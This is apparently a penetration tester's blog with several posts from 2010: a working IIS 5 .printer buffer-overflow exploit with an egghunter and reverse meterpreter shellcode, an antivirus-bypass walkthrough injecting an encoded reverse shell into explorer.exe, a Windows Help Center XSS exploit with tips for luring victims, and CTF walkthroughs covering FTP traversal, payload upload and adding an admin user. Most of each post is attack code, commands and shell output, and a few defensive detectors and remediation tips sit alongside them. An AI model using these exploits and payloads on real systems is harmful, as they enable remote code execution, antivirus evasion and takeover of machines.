Wednesday, November 24, 2010

Blast From The Past

Recently on a test I ran into a Windows 2000 server running IIS 5 with the Internet Printing module enabled. I was quite surprised by this but...a shell is a shell, right? Since this was on the job and I wasn't wearing my cowboy hat, I fired up my Windows 2000 VM (who doesn't have one of those?) and went to work. Metasploit has a module for this vuln (exploit/windows/iis/ms01_023_printer) but surprisingly it is pretty flaky. On the first run the exploit module did not work, so I took a look at my IIS configuration again to make sure everything was set up properly. After confirming the IIS settings I tried the module a couple more times and finally got a shell. I restarted IIS and tried the module a few more times; it was still hit or miss - sometimes it would work on the first try, sometimes it would take three tries. Something was strange....

After breaking out Immunity Debugger it became clear why the exploit did not work every time. According to the Metasploit module the shellcode is held at an offset from EBX, and a short assembly stub jumps to that location (see the Metasploit snippet below):

buf = make_nops(280)
buf[268, 4] = [target.ret].pack('V')

# payload is at: [ebx + 96] + 256 + 64
buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]
buf << "\x80\xc1\x40" # add cl, 64
buf << "\x80\xc5\x01" # add ch, 1
buf << "\xff\xe1" # jmp ecx

sock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")

While this does work, it appears that sometimes the payload is not within that window and the exploit fails. Since we know roughly where in memory our payload will be when we gain control of EIP, this seems like a good place to use an egghunter :) I started out with an existing egghunter and modified it a little: since I know roughly where in memory my payload is, there was no sense looking everywhere for it :) A warning ahead of time - I was lazy and nop'd out the access violation check...I had plenty of bytes to burn ;) -

mov edx, ebx             # ebx is the area of our starting point
or dx, 0x0fff
xor dx, 0x0fff           # clear out the bottom 12 bits of edx (page align) for the start of our loop
next_byte:
inc edx                  # increment edx - this is the start of our loop
nop                      # abbreviated nops where the original access violation check was
mov eax, 0x57303054      # load our egg "W00T" (sits in memory little-endian as "T00W")
mov edi, edx             # set edi to point at our current location in memory
scas dword ptr es:[edi]  # compare our egg to the dword at edi
jnz next_byte            # jump back to the start of our loop (inc edx) if we didn't find the egg
scas dword ptr es:[edi]  # compare our egg to the next dword for the 2nd part of the egg
jnz next_byte            # jump back to the start of our loop (inc edx) if we didn't find the 2nd egg
jmp edi                  # jump to edi as it points to the first byte after our egg

After implementing the egghunter in the exploit I had no issues getting a shell every time :)
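As an added example (not from the original post), a Python model of the stub above: memory is a byte string, addresses are indices, and the search runs the way the assembly does, page-aligning the start from EBX and requiring the egg twice so the single copy inside the hunter's own mov eax does not stop the scan early. The memory image is constructed.

```python
from typing import Optional

PAGE_MASK = 0xFFFFF000   # the or/xor pair on dx clears the low 12 bits: page-align the start
EGG = b"T00W"            # mov eax, 0x57303054 is the bytes 54 30 30 57 in memory, i.e. "T00W"


def hunt_egg(memory: bytes, ebx: int, egg: bytes = EGG) -> Optional[int]:
    """Byte-for-byte model of the stub above, with `memory` standing in for the
    process address space and indices standing in for addresses.
    Starts at the page that contains EBX and walks forward one byte at a time
    until the egg appears twice back to back; returns the index of the first
    byte after the doubled egg (where 'jmp edi' lands).  The real stub never
    gives up; this model returns None at the end of the buffer instead."""
    n = len(egg)
    edx = ebx & PAGE_MASK            # or dx, 0x0fff / xor dx, 0x0fff
    while True:
        edx += 1                     # inc edx  (top of the loop)
        if edx + 2 * n > len(memory):
            return None              # ran off the modelled region
        edi = edx                    # mov edi, edx
        if memory[edi:edi + n] != egg:
            continue                 # scasd #1 mismatched: jnz back to inc edx
        edi += n                     # scasd advanced edi past the first copy
        if memory[edi:edi + n] != egg:
            continue                 # scasd #2 mismatched: jnz back to inc edx
        return edi + n               # jmp edi: first byte after the second copy


def build_sample_image():
    """Constructed memory image (not a real dump): a page of zeros, a region
    shaped like the hunter itself, which contains the egg exactly once as the
    immediate of its 'mov eax', a run of filler, and finally the doubled egg
    with a marker standing in for the payload.  Returns (image, ebx, expected)."""
    hunter_like = b"\x90" * 40 + b"\xb8" + EGG + b"\x90" * 60   # single egg: must be skipped
    marker = b"PAYLOAD"
    image = b"\x00" * 0x1200 + hunter_like + b"A" * 300 + EGG + EGG + marker
    ebx = 0x1230                     # EBX points somewhere inside the hunter-like region
    expected = len(image) - len(marker)
    return image, ebx, expected


if __name__ == "__main__":
    img, ebx, want = build_sample_image()
    print("payload found at offset", hunt_egg(img, ebx), "expected", want)
```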

Full exploit below - obviously you will have to change the shellcode for it to work for you -

import urllib2
import sys

# the doubled egg the hunter searches for, then a small nop sled in front of the payload
shell = "T00WT00W"
shell += "\x90" * 10

# msfpayload windows/meterpreter/reverse_tcp lhost= R|msfencode -e x86/alpha_upper -t c #
shell += ("\x89\xe1\xd9\xe8\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
          # ... remainder of the encoded payload truncated in the original post
         )

# assembled bytes of the egghunter stub shown above (placeholder, not reproduced here)
egghunter = ""

# 268 bytes of filler, the return address, a few nops, the egghunter and more padding
buff = 'A' * 268 + '\x4d\x3f\xe3\x77' + "\x90" * 5 + egghunter + '\x90' * 156
useragent = 'Shit Bird'
header = {'User-Agent': useragent, 'Host': buff}

req = urllib2.Request('http://' + sys.argv[1] + '/NULL.printer?' + shell, headers=header)
res = urllib2.urlopen(req)
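From the defensive side, as an added example that is not part of the original post: a parser for the raw request shape this exploit sends (a .printer target, an oversized Host value, the payload in the query string), with thresholds taken from the 268-byte offset above. The two sample requests are constructed.

```python
import re
from typing import Dict, List, Optional

# The exploit above needs 268 bytes of Host before it reaches the saved return
# address, so a .printer request carrying a Host value anywhere near that is
# worth an alert on its own; the encoded payload rides in the query string.
HOST_LEN_THRESHOLD = 256
QUERY_LEN_THRESHOLD = 256


def parse_request(raw: str) -> Optional[Dict[str, str]]:
    """Split a raw HTTP/1.x request into its request line and headers.
    Header names are lower-cased and prefixed with 'hdr:'.  Returns None when
    the request line does not have exactly three fields."""
    lines = raw.split("\r\n")
    fields = lines[0].split(" ")
    if len(fields) != 3:
        return None
    req = {"method": fields[0], "target": fields[1], "version": fields[2]}
    for line in lines[1:]:
        if line == "":
            break                                   # blank line ends the headers
        name, _, value = line.partition(":")
        req["hdr:" + name.strip().lower()] = value.strip()
    return req


def printer_alerts(raw: str) -> List[str]:
    """Reasons a request looks like an ISAPI .printer overflow attempt; [] if none."""
    req = parse_request(raw)
    if req is None:
        return ["malformed request line"]
    target = req["target"]
    # absolute-form targets (GET http://<host>/NULL.printer?...) carry the host
    # in the URL itself, which is where the Metasploit module puts its buffer
    m = re.match(r"https?://([^/]*)(/.*)?$", target, re.I)
    url_host, path_q = (m.group(1), m.group(2) or "/") if m else ("", target)
    path, _, query = path_q.partition("?")
    if not path.lower().endswith(".printer"):
        return []                                   # not the vulnerable ISAPI extension
    alerts = []
    hosts = [h for h in (url_host, req.get("hdr:host", "")) if h]
    if any(len(h) >= HOST_LEN_THRESHOLD for h in hosts):
        alerts.append("Host value of %d+ bytes on a .printer request" % HOST_LEN_THRESHOLD)
    if any(not (h.isascii() and h.isprintable()) for h in hosts):
        alerts.append("non-printable or non-ASCII bytes in Host value")
    if len(query) >= QUERY_LEN_THRESHOLD:
        alerts.append("query string of %d+ bytes on a .printer request" % QUERY_LEN_THRESHOLD)
    return alerts


# Constructed samples (not captured traffic): an ordinary print request, and one
# shaped like the script above with filler standing in for the return address,
# egghunter and encoded payload.
BENIGN = "GET /printers/NULL.printer HTTP/1.0\r\nHost: print.example\r\n\r\n"
SUSPECT = ("GET /NULL.printer?" + "T00WT00W" + "\x90" * 10 + "Q" * 400 + " HTTP/1.0\r\n"
           + "Host: " + "A" * 268 + "RET!" + "\x90" * 5 + "H" * 32 + "\x90" * 156 + "\r\n\r\n")

if __name__ == "__main__":
    for name, sample in (("benign", BENIGN), ("suspect", SUSPECT)):
        print(name, printer_alerts(sample))
```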

Friday, August 20, 2010

Open LockSport Donations

A slight divergence from the technical for a moment: everyone should go check out a cool new line of custom lock-picking tools that will be coming out shortly. Pre-order yours by providing a donation to get the business started. I proudly donated a very large sum to this cause today and set up onsite training as well for a group of my friends with the creator of these lock-picks....

Check it out!!!

Generally I like to stay 100% technical in my posts, but this guy was really cool and extremely excited about what he does, and that's what I like to see!!! Motivated people with passion about their interests... I am always about supporting individuals like this... So check them out and get yourself a nice set of custom lock-pick tools...

And if you're in the Cleveland area and interested in lockpicking, send me a message and I will let you know about lockpicking meetups.

Tuesday, August 17, 2010

Bypassing AntiVirus With Process Injection

There is a new tool for antivirus bypass which allows an attacker to inject shellcode into a process post exploitation, enabling the attacker to pass a shell to a remote location; generally I assume this would be a meterpreter shell for obvious reasons. Those of us who penetration test for a living are aware of the need to sometimes have a shell after obtaining GUI system access. Buuuut antivirus can be a real pain in the ass sometimes.

A few people came to me today saying they tried this new technique and it looked awesome but was not functioning correctly. Below is a description of why it was not working for them and how to fix it.. here is a link to the program for reference.

Videos are cool and all, but as we know they tend to leave things out; in this case they left out the proper way to create shellcode. They also left out how to create the file to inject into the process, so below is a walkthrough, without missing any details, of how to get a shell by injecting into a process with injector... Honestly, I wish people who developed tools would not leave out details in their videos. I also wish they would learn to talk and explain things as they create the video rather than having a distracting song..

Mainly I believe the issues people were having were bad characters within their shellcode. (Although I did not verify this in a debugger, the crash behavior leans towards this assumption.)

When you inject a payload into a process, if any characters are bad, such as null characters, the process will terminate or produce undesired results. It doesn't always have to be null; all processes and programs are created differently, depending on what they are looking for. Encoding is a good way to solve these issues. So let's get to it!!

Original Video:

Issues people had:
-Injecting into Explorer.exe crashes the process... (explorer being a good process because it re-spawns)

-Alpha upper encoding
-using the py file to create raw code

So basically the problem people were having is that there were bad characters in their shellcode that were crashing the process. Following is a step by step on how to use the antivirus bypass technique, which the video does not show clearly or in its entirety....

1. First Create your shell-code: (Alpha upper encode the shellcode, and add a thread exit function)

root@Ficti0n:/pentest/exploits/framework3# ./msfpayload windows/shell_reverse_tcp LHOST= LPORT=4444 EXITFUNC=thread R | ./msfencode -e x86/alpha_upper

[*] x86/alpha_upper succeeded with size 699 (iteration=1)
buf =
"\x89\xe6\xdb\xd8\xd9\x76\xf4\x58\x50\x59\x49\x49\x49\x49" +
"\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" +
"\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" +
"\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" +
"\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" +

The output from this will be very large but no worries size doesn't appear to be an issue....

2. Put this shell-code into the file like so (remove all + signs and surround the output with parentheses):

................. )


3. Start up your multi/handler; after you receive the payload you will get a shell... (go to step 4 below to send off your payload.)

msf > use multi/handler
msf exploit(handler) > set payload windows/shell_reverse_tcp
payload => windows/shell_reverse_tcp
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444

msf exploit(handler) > exploit

[*] Started reverse handler on
[*] Starting the payload handler...
[*] Command shell session 1 opened ( -> at Tue Aug 17 20:30:20 -0400 2010

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Administrator> YAY FOR SHELL

4. Check your process list for explorer.exe, then ship off your payload into the process. This payload is now encoded to remove all bad characters, and with your multi/handler running you should receive a shell no problem.

C:\Documents and Settings\Administrator\Desktop\injector>tasklist

Image Name                     PID Session Name     Session#    Mem Usage
========================= ====== ================ ======== ============
System Idle Process            0 Console                 0         28 K
System                         4 Console                 0        244 K
smss.exe                     620 Console                 0        388 K
csrss.exe                    668 Console                 0      1,660 K
winlogon.exe                 692 Console                 0      5,152 K
services.exe                 736 Console                 0      4,312 K
lsass.exe                    748 Console                 0      1,544 K
vmacthlp.exe                 904 Console                 0      2,292 K
svchost.exe                  920 Console                 0      4,548 K
svchost.exe                 1000 Console                 0      4,012 K
svchost.exe                 1092 Console                 0     21,824 K
svchost.exe                 1136 Console                 0      3,060 K
svchost.exe                 1212 Console                 0      4,584 K
spoolsv.exe                 1416 Console                 0      5,476 K
sqlservr.exe                1800 Console                 0      8,684 K
sqlwriter.exe               1948 Console                 0      3,268 K
notepad++.exe               2104 Console                 0      3,072 K
notepad.exe                 3612 Console                 0      3,388 K
explorer.exe                1568 Console                 0     22,064 K
tasklist.exe                1900 Console                 0      4,244 K
wmiprvse.exe                2708 Console                 0      5,404 K

C:\Documents and Settings\Administrator\Desktop\injector>injector.exe pgeneric.txt 1568

[*] Author: DouBle_Zer0
[*] HACKERS GARAGE Production
[*] Visit Us:

C:\Documents and Settings\Administrator\Desktop\injector> Your payload was just sent!! check your meterpreter

I hope that clears a few things up for anyone who was asking me how to utilize this tool on a pentest. This is an excellent technique and very neat, but the explanation of proper payloads and examples was lacking; I would have much preferred a written write-up with more detail for reference, so that is what I am providing..

Final Note:
You will notice I used the explorer.exe process; the reason is that if I blow it up, it will respawn itself. This is also a good technique when migrating processes in Meterpreter: if explorer.exe Fubars, you can just kill the process and it will respawn. I have used this technique on processes running as a domain administrator to get full domain access. When I blew up the process I lost access, but I was able to just respawn it and regain my foothold when no hashes or tokens were available.


Friday, June 11, 2010

Windows XP Help Center Client Side Attack

I Just saw this exploit in full disclosure and ExploitDB:

Then I checked in metasploit and the exploit is already available.

If you are on an internal or client-side penetration test, I generally see most clients running Windows XP and generally outdated browsers, either IE6, IE7 or IE8.... The essence of this attack is that an unhandled XSS in hcp://system/sysinfo/sysinfomain.htm?svr= is utilized, which can be accessed directly via a URL in a browser. By using defer in the XSS to execute a script in a privileged zone, a Windows popup is bypassed:

<script defer>code</script>

"due to insufficient escaping in GetServerName() from sysinfo/commonFunc.js, the page is vulnerable
to a DOM-type XSS. However, the escaping routine will abort encoding if characters such as '=' or '"' or others are specified. "

This exploit works on XP SP2 and SP3, which covers most clients in most companies. I do not see many companies running Vista or Windows 7.... IE6 and IE7 are vulnerable to this attack; IE8 works too but with a user popup box, unless the victim is running certain versions of Media Player... I also just tested this with an IE8 browser running in compatibility mode... When the client visited the page the exploit automatically pulled up the help docs and gave me a meterpreter shell   wooooot

I am thinking this would be a good exploit to use in client side penetration tests... So below is the info and a quick usage of the exploit...

Module Name:

Below is a description and then usage of the module... give it a try...

Description: (From Metasploit)
  "Help and Support Center is the default application provided to
  access online documentation for Microsoft Windows. Microsoft
  supports accessing help documents directly via URLs by installing a
  protocol handler for the scheme "hcp". Due to an error in validation
  of input to hcp:// combined with a local cross site scripting
  vulnerability and a specialized mechanism to launch the XSS trigger,
  arbitrary command execution can be achieved. On IE6 and IE7 on XP
  SP2 or SP3, code execution is automatic. On IE8, a dialog box pops,
  but if WMP9 is installed, WMP9 can be used for automatic execution.
  If IE8 and WMP11, a dialog box will ask the user if execution should
  continue. Automatic detection of these options is implemented in
  this module, and will default to not sending the exploit for
  IE8/WMP11 unless the option is overridden."

Simple Usage Example:
msf > use windows/browser/ms10_xxx_helpctr_xss_cmd_exec
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LHOST
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > set LPORT 5555
LPORT => 5555
msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on
[*] Using URL:
[*]  Local IP:
[*] Server started.

Send Your Link to the Victim and wait: 

Now send the victim a link to your IP address via email or chat. Generally I would have a registered URL that looks friendly and send them that URL in order to not look too suspicious.

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > [*] Request for "/" does not contain a sub-directory, redirecting to /c3hfRM5Kh/ ...
[*] Sending Microsoft Help Center XSS and Command Execution to
[*] Responding to request for exploit iframe at
[*] Request for "/" does not contain a sub-directory, redirecting to /ETnOhHE9EqYirlA/ ...
[*] Responding to WebDAV OPTIONS request from
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending EXE multistatus for /Vl/ly.exe ...
[*] Request for "/Vl" does not contain a sub-directory, redirecting to /Vl/ ...
[*] Received WebDAV PROPFIND request from
[*] Sending directory multistatus for /Vl/ ...
[*] GET for payload received.
[*] Sending stage (748032 bytes) to
[*] Meterpreter session 1 opened ( -> at Fri Jun 11 18:10:38 -0400 2010

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -l

Active sessions

  Id  Type         Information                      Connection
  --  ----         -----------                      ----------
  1   meterpreter  EXPLOIT\Administrator @ EXPLOIT ->

msf exploit(ms10_xxx_helpctr_xss_cmd_exec) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: EXPLOIT\Administrator

Final Notes:

There you have it... This module sets up a server and waits for your victim to make a connection; when the victim does make a connection their help window is opened and they are silently owned.... More than likely the victim will just think Windows is acting up as it usually does, or that they accidentally clicked something  :) :)  Maybe you should be using FreeBSD or Slackware instead?  You might still get owned but at least you will know it's not the OS acting up hahahaha

Monday, May 10, 2010

Offensive Security Part 2 -- KilltheN00b Walk Through

How Strong is Your FU hacker challenge Part 2

Target 2: KilltheN00b

After some chips, salsa and a supersized burrito from el habinaro I was down for another challenge. I logged into the Offsec labs and reviewed some of the documentation on the contest page, which stated there were 2 targets.


After a quick portscan I chose to attack KilltheN00b purely based on the number of open ports available on the system. Ghost provided HTTP only. KilltheN00b had various ports open including FTP, HTTP and various mail ports.

Scan output:
21/tcp   open  ftp
|_ftp-anon: Anonymous FTP login allowed
25/tcp   open  smtp          Surgemail smtpd 3.8k4-4
80/tcp   open  http          Surgemail webmail (DNews based)
|_html-title: SurgeMail Welcome Page
106/tcp  open  pop3pw        Qualcomm poppassd (Maximum users connected)
110/tcp  open  pop3          SurgeMail pop3d 3.8k4-4
143/tcp  open  imap          SurgeMail imapd 3.8k4-4
366/tcp  open  smtp          Surgemail smtpd 3.8k4-4
465/tcp  open  tcpwrapped
587/tcp  open  smtp          Surgemail smtpd 3.8k4-4
993/tcp  open  tcpwrapped
995/tcp  open  tcpwrapped
3389/tcp open  ms-term-serv?
7025/tcp open  tcpwrapped
7443/tcp open  tcpwrapped

More ports = = more fun ??
More Targets = = more fun??
All Girls Just want to have fun?? Wait no that's a song LOL

Probably a wrong assumption, but it's a good theory to cling to when things get rough.

Initial FTP probing:
First thing I did was log into the FTP server with credentials that were provided on the Offsec page. After logging in there wasn't much to play with in any available directories, so I decided to try to hop out of the FTP environment.

I tried to hop out of the FTP directory structure via directory traversal with "cd ../../../../../"... Failed, so I then flipped the slashes to "cd ..\..\..\..\..\" and the response back indicated a fail. So I decided to directly call the root directory with "cd c:".


"cd c:" correctly hopped me into a directory with loads of files available. I also seemed to be able to browse to a directory with system32 files. My actual first thought was to replace the system32 program Magnify.exe with my evil payload so that at the Remote Desktop login the accessibility options would become a shell. Unfortunately I didn't have access to write to that directory, so I moved on. After browsing files for a while I decided this FTP session was a bust and logged out.

Next I decided to hit up the web page located on KilltheN00b. The webserver indicated an application by the name of "surgemail".

I also noted that the scripts directory on this site seemed to execute pages with an EXE extension. Very interesting...

I then checked the exploit databases and verified an exploit for the version of SurgeMail running that was valid for Windows 2000 and 2003.

Next I decided to check the remote desktop port, only to find out KilltheN00b was running a Windows 7 operating system and the exploit would need modification before it would work. This was a


I loaded up the debugger and started modifying the exploit, and after a bit of wrestling with the exploits located on ExploitDB I realized that I was unable to control EIP... Either due to my lack of advanced level exploitation skill, or the differences in operating systems or their protection mechanisms, I only had control of certain parts of the stack but no EIP overwrite. To be precise, this exploit relies on a partial overwrite of EIP: the OS already provides a zero byte as the first byte of the 4-byte EIP, so to bypass filters on insertion the overflow uses what is already present (I like that); otherwise our own null would stop execution of the program prematurely.

Before going further with this I realized this exploit was a post authentication exploit and would need a user account. grrrr

More Web:
I browsed around the SurgeMail pages for a while trying attacks against authentication and authorization without much success, until I hit a /domainadmin management page. On this page I was able to guess a password of test/test, using Burp "comparer" to compare my responses; I noticed one of the outputs said "Account Details". I then verified that I could log into the server by logging into another port used for changing passwords, "poppassd" on port 106. The found login worked.

Woot, I could now use that exploit if I could get it to work.. however it was still a fail after messing with it for a few hours.

Back to FTP:
After noticing the EXE files with possible execution on the webpage I decided to hit the FTP session back up and see if I could get to the scripts directory. After messing around for a while I realized that the "cd ..\..\" actually was working, and after a few iterations it got me to the root directory. I browsed to the surgemail/scripts directory:

ftp> cd ..\..\..\
250 Directory changed to "/MyDocuments/............./......../......".
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for listing
dr-xrwx--- 1 admin users              0 May 03 22:58 $Recycle.Bin
dr-xrwx--- 1 admin users              0 Jul 13 2009 Documents and Settings
dr-xrwx--- 1 admin users              0 Jul 13 2009 PerfLogs
dr-xrwx--- 1 admin users              0 May 03 19:20 Program Files
dr-xrwx--- 1 admin users              0 May 03 19:21 ProgramData
dr-xrwx--- 1 admin users              0 May 03 22:51 Python26
dr-xrwx--- 1 admin users              0 Apr 30 01:21 Recovery
dr-xrwx--- 1 admin users              0 May 07 23:48 surgemail
dr-xrwx--- 1 admin users              0 May 03 22:38 System Volume Information
dr-xrwx--- 1 admin users              0 May 07 23:48 Users
dr-xrwx--- 1 admin users              0 May 03 21:28 Windows
-r--rr---- 1 admin users             24 Jun 10 2009 autoexec.bat
-r--rr---- 1 admin users             10 Jun 10 2009 config.sys
-r--rr---- 1 admin users     2147016704 May 07 23:44 pagefile.sys
-r--rr---- 1 admin users       12645888 May 03 05:53 surgemail_installer.exe
ftp> cd surgemail
250 Directory changed to "/MyDocuments/............./......../....../surgemail".
ftp> cd scripts
250 Directory changed to "/MyDocuments/............./......../....../surgemail/scripts".

I then tried uploading a test file and it worked.... at this point I got pretty excited and went into exploitation mode.

Meterpreter Evil.exe:
Now I needed an evil EXE file to have the webserver serve up for me on behalf of the KilltheN00b host. So I popped open Metasploit..

Create a reverse_tcp meterpreter shell.
root@ficti0n:~# cd /pentest/exploits/framework3
root@ficti0n:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > evil.exe
Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
 Length: 290
Options: LHOST=,LPORT=4444

Now we have our test shell to try, which I then uploaded to the FTP server in the surgemail/scripts directory; this directory also contained other exe files such as webmail.exe.

Back to the web part 2: the evil upload

Back on the web it was time to browse to the scripts directory and cross my fingers and toes, along with yelling at my friends to cross their fingers and toes too!!!  Very important that all the bases are covered in information security..

Offensive Security in depth!!!  or something like that.. (Wishful thinking)

So I started a multi/handler in Metasploit first, just in case the reverse shell worked.
msf > use multi/handler
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler...
I then proceeded to browse to the directory with all body parts crossed.....hoping for a connect back.


My connection status in metasploit then indicated i had an open session.  :)

Post Explotation:
With a shiny shell in hand I first dumped the hashes via meterpreter hashdump, but I noticed from the sequence of characters that the LM hashes were blank. So I decided to just create my own user using the following scenario.

Get higher privileges:
meterpreter > getsystem
...got system (via technique 1).

Add a new domain admin:
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > add_user ficti0n
[*] Attempting to add user ficti0n to host
[+] Successfully added user
meterpreter > add_localgroup_user Administrators ficti0n
[*] Attempting to add user ficti0n to localgroup Administrators on host
[+] Successfully added user to local group

But I like GUIs, so let's get remote desktop. I noted in an earlier attempt to log into Windows with my FTP credentials that I needed to be part of the Remote Desktop Users group.. so let's be part of the cool kids group, shall we??

Get a Remote Desktop Gui:
meterpreter > add_localgroup_user "Remote Desktop Users" ficti0n
[*] Attempting to add user ficti0n to localgroup Remote Desktop Users on host
[+] Successfully added user to local group

SCORE. I can now log in as domain admin on a pretty GUI interface provided by Microsoft.. Thanks Microsoft :)  and thanks Metasploit.

After logging into the Windows 7 machine I quickly found my proofs.txt and added it to the online scoreboard to raise me up to 50pts total. Job well done... Thanks to steponequit and carnalownage and sygog for collaborating on attack possibilities; sometimes multiple minds work better, and even if it's not the solution, possibilities for the future arise.

Lessons Learned:
-Don't listen to other people's chatter and take it as truth. While I was in IRC everyone was talking about compiling code and getting payloads correct..
-I knew better, I knew there was an easier way and only wasted a limited amount of time on exploit writing. I am sure there is a way to transfer that exploit but messing around all day isn't going to get me past the challenge.
-Again, go with your initial observations of the application. My observation that the webpage was executing EXE files ultimately got me into the application even though I veered off the path for a while listening to people in the IRC chat about payloads.
-Also, again, always try things twice and CONFIRM.... Initially I thought I didn't have the traversal. It turns out I did, 3 hours before I used it!

-Check the ACLs and the jails on your FTP servers and make sure they are not traversable.
-Review your applications for any known exploitable 3rd party software and update.
-Do antivirus checking on file uploads to stop payloads from being uploaded and executed.
-Do egress filtering to stop unnecessary ports from calling back to listeners on attackers' machines.
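As an added example (not the contest box's FTP server code): a model of the check that failed here, which only knows the forward-slash spelling of "..", next to a hardened version that resolves the path the way Windows would, backslashes and drive letters included, before comparing it with the jail root. The jail root path is constructed.

```python
import ntpath

# Constructed jail root for the model; the contest box's real path is not on the page.
FTP_ROOT = r"C:\ftp\MyDocuments"


def naive_check(requested: str) -> bool:
    """The kind of filter that let the post's traversal through: it only knows the
    forward-slash spelling of '..', so '..\\..\\' and 'c:' are waved through."""
    return "../" not in requested


def resolve_on_windows(root: str, cwd: str, requested: str) -> str:
    """Model of how a Windows file system actually resolves a 'cd' argument:
    both '/' and '\\' separate components, 'c:' restarts at a drive, and a
    leading slash restarts at the root of the current drive."""
    drive, rest = ntpath.splitdrive(requested)
    if drive:                                       # 'c:' or 'c:\\foo'
        base, rest = drive + "\\", rest.lstrip("\\/")
    elif requested[:1] in ("\\", "/"):              # rooted on the jail's drive
        base, rest = ntpath.splitdrive(root)[0] + "\\", requested.lstrip("\\/")
    else:
        base = ntpath.join(root, cwd.strip("\\/"))
    return ntpath.normpath(ntpath.join(base, rest))


def hardened_check(root: str, cwd: str, requested: str) -> bool:
    """Resolve first, then decide: the target is allowed only if the normalised
    result is the jail root itself or lies strictly beneath it."""
    resolved = ntpath.normcase(resolve_on_windows(root, cwd, requested))
    jail = ntpath.normcase(ntpath.normpath(root))
    return resolved == jail or resolved.startswith(jail + "\\")


# Constructed 'cd' arguments: the two spellings the post tried, 'cd c:', and a
# legitimate move into the surgemail scripts directory.
ATTEMPTS = ["../../../../../", "..\\..\\..\\", "c:", "surgemail/scripts"]

if __name__ == "__main__":
    for arg in ATTEMPTS:
        print("%-20r naive=%-5s hardened=%-5s -> %s" % (
            arg, naive_check(arg), hardened_check(FTP_ROOT, "", arg),
            resolve_on_windows(FTP_ROOT, "", arg)))
```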

Get a HUGE security budget and hire me to run all your penetration tests for twice your average cost!!! Preferably from the beach, externally :) Don't forget to add Redbull and Sour Patch Kids to the budget!!!  They are ESSENTIAL to my findings.

Closing notes:
I then went to the gym to wake up my forgotten muscles from sitting around all day and night... This was over 24 hours into this Challenge, I cheated and took a little (LONG)  nap somewhere in there too.. I know I know.. sleeping on the job, but hey there was a pillow close by and I ran out of the redbull..

Up next:  Part 3
Dropping shells on the Ghost and watching him laugh as he ultimately owns me!!!! 

Offensive Security n00bFilter Walk Through

How Strong is Your FU hacker challenge

Target 1: N00bFilter

The first target in this weekend’s offensive security challenge was nicknamed n00bfilter as it was used to weed out all the n00bs who would plague the internal Offsec networks with high bandwidth unnecessary tools such as Nessus or Webinspect hoping for an easy hit. Tools like these, while useful, are not going to directly aid you in exploitation of this CTF challenge. Your BRAIN is the only valid tool in an offsec challenge. At first glance n00bfilter appears to be a login and password prompt to an application with no other available options but username and password. Source looks pretty standard as well.. Nothing special, no JavaScript or includes to be had.

First Clue: Error Message

Like most pentests, your first inclination would be to put a single quote or random character into the field and see if it errors out. After adding a single quote I was presented with a taunting answer of "HAHAHA" rather than the expected SQL error or perhaps an invalid character message. Upon further inspection of the error page's source code it was noted that this was an Applicure error message, Applicure being the vendor of Dot Defender, a well known Web Application Firewall (WAF). I found it interesting that a n00bfilter would be running an IDS/IPS product, and started performing further probing of the application.

Annoyance: cool out periods

I then started trying default user/pass combinations such as admin/admin, admin/password. Anything that a normal administrator would FAIL to change. This led me nowhere quickly, at which time I started losing my connection to the application.  After roughly 5 minutes I was back online and figured my internet connection was foobarred... Got to love sketchy cable connections, right?? I swear they do bandwidth limiting but whatever.. LOL   A few minutes later I was blocked again, and again, and again.... Apparently Dot Defender was set to "Cool me down” when I got out of control.... Very NOT COOL..... This annoyed me because I was manually probing the application. This application also appeared to vary its cool-outs based on what you were doing: messing with the URL, messing with the input fields, certain characters, some may be ok, others blocked you immediately, then sometimes after a few tries... Interesting, the application has a personality apparently.

Thought: Dot Defender bypass

When I started getting owned by Dot Defender over and over again I started to think maybe I have to shut the WAF down, or at least add my IP address to a list of friends within Dot Defender's configuration. But how??
I immediately started researching dot defender weaknesses and vulnerabilities on my good friend Google and this was found...

Full Disclosure:
The above link states that post authentication there is a vulnerability that allows an attacker to run commands on the operating system via the delete site method. Hmmm “post authentication”. This means I need credentials, bullocks!! I don't have credentials.

Ok back to Google; the Google gods then provided me with a few tidbits of information regarding Dot Defender, one useful piece being that the DotDefender site manager was located at /dotDefender. I browsed to this address and sure enough I was prompted with a basic authentication login prompt that told me its username was "Admin". Now I have a login name, the struggle is half over, right? So I tried all the default password combos and a few random passwords based on the site and the challenge.


Dont Second Guess yourself:

Figuring that a vulnerability on Full Disclosure was not going to be the issue, especially being post-auth on a n00bFilter, I moved back to probing the app... I went at it for a while with combinations of character encodings and character assembly that might fool the WAF into either letting my attacks through or removing just enough of the attack to reassemble it for me.. Attacks such as <scr><script>ipt> or other combinations using various encoding techniques...

Again FAIL!!

